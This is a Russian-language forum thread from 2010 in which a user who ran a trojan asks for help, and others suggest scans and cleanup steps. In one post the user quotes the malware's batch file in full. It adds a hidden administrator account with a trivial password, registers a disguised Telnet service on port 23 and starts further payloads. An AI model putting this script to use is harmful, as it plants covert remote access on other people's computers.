Вроде как хватанул трой

Discussion in 'Болталка' started by FaS, 17 Sep 2010.

  1. FaS

    FaS Elder - Старейшина

    Joined:
    3 Aug 2008
    Messages:
    64
    Likes Received:
    144
    Reputations:
    22
    deleted
     
    #1 FaS, 17 Sep 2010
    Last edited: 17 Mar 2015
  2. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,362
    Likes Received:
    1,041
    Reputations:
    356
    avz проверься. загрузи драйвер расширеного мониторинга и полную проверку запусти
    ну и соединения посмотри. все выключи аськи/скайп/етс и посмотри кто куда ломится
     
    _________________________
  3. FaS

    FaS Elder - Старейшина

    Joined:
    3 Aug 2008
    Messages:
    64
    Likes Received:
    144
    Reputations:
    22
    да но смысла нету тут, у меня кучу софта палит , просто в исключениях стоят папки и я их трогать и не хочу даже.
    просто как сразу скачал ехе, создалась учетка, я быро удалили, почистил что мог, поставил файер, убрал странные процессы с автозагрузки.
    мне бы как-то отследить что он делает вирь этот .
    где он вообще засел.
     
  4. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,362
    Likes Received:
    1,041
    Reputations:
    356
    ну это на вирталке тестить надо куда он лезет и куда записывается. откат системы бы сделал и спал спокойно.
     
    _________________________
  5. FaS

    FaS Elder - Старейшина

    Joined:
    3 Aug 2008
    Messages:
    64
    Likes Received:
    144
    Reputations:
    22
    не выйдет спать спокойно, откат невозможен :mad:
    кому не лень помогите выследить заразу.
     
    #5 FaS, 17 Sep 2010
    Last edited: 17 Sep 2010
  6. FaS

    FaS Elder - Старейшина

    Joined:
    3 Aug 2008
    Messages:
    64
    Likes Received:
    144
    Reputations:
    22
    крч попался я, все наверно слито((
    и ище в придачу вирей наверняка накидали.
    крч помог Kaimi хороший однако человек!!!!!
    сам код:
    clicker.exe
    mail.vbs
    user.bat
    YoozyServer.exe

    вот скажем текст из user.bat
    Code:
    @Echo off start C:\WINDOWS\mail.vbs start C:\WINDOWS\clicker.exe chcp 1251 net user SUPPORT_388945a0 /delete net user SUPPORT_388945a0 1 /add net localgroup "Администраторы" SUPPORT_388945a0 /add net localgroup "Пользователи" SUPPORT_388945a0 /del copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" ECHO Windows Registry Editor Version 5.00>>user.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg ECHO "SUPPORT_388945a0"word:00000000>>user.reg regedit /s user.reg && DEL user.reg sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." sc config tlntsvr start= auto tlntadmn config port=23 sec=-NTLM net start Telnet start C:\WINDOWS\YoozyServer.exe 
    вроде все почистил :mad:
     
    #6 FaS, 17 Sep 2010
    Last edited: 18 Sep 2010
  7. FaS

    FaS Elder - Старейшина

    Joined:
    3 Aug 2008
    Messages:
    64
    Likes Received:
    144
    Reputations:
    22
    tlntsvr.exe нихера не удаляеться. каждый раз заново созадеться в /system32\tlntsvr.exe

    что делать то?
     
  8. TrambleR

    TrambleR Banned

    Joined:
    26 Jun 2010
    Messages:
    403
    Likes Received:
    32
    Reputations:
    1
    через поиск потыкай .vbs файлы, пооткрывай блокнотиком и посматри, также порой в поиске tlntsvr.exe clicker.exe YoozyServer.exe посмотри что в автозагрузке есть также закорзинь учетку SUPPORT_388945a0
     
  9. FaS

    FaS Elder - Старейшина

    Joined:
    3 Aug 2008
    Messages:
    64
    Likes Received:
    144
    Reputations:
    22
    все сделал вроде, tlntsvr.exe не удаляеться наврено изза того что системный файл вроде, толнет вообще нафиг отключил.
     
  10. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,362
    Likes Received:
    1,041
    Reputations:
    356
    гугл подсказывает, что
    Telnet

    TlntSvr


    tlntsvr.exe
    Удаленно запускают на вашей машине программы из консоли,- Отключить

    проверь avz диск С:. ты же не на С: хранишь разные штуки?
    http://z-oleg.com/avz4.zip
     
    _________________________
    #10 оlbaneс, 18 Sep 2010
    Last edited: 18 Sep 2010
  11. DiplomatQ

    DiplomatQ Elder - Старейшина

    Joined:
    4 Jun 2008
    Messages:
    48
    Likes Received:
    5
    Reputations:
    1
    скинь код нормально оформленным, интересно глянуть
     
  12. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,362
    Likes Received:
    1,041
    Reputations:
    356
    так и думал. вобщем сам читай http://www.proxy-base.org/f71/vzlom_kompa_otkryvaem_23_telnet_i_28137_ftp_cherez_otkrytku-6601.html

    ну или сдесь http://hackers-street.ru/showthread.php?p=790
     
    _________________________
    #12 оlbaneс, 18 Sep 2010
    Last edited: 18 Sep 2010
  13. FaS

    FaS Elder - Старейшина

    Joined:
    3 Aug 2008
    Messages:
    64
    Likes Received:
    144
    Reputations:
    22
    ыы ппц :mad: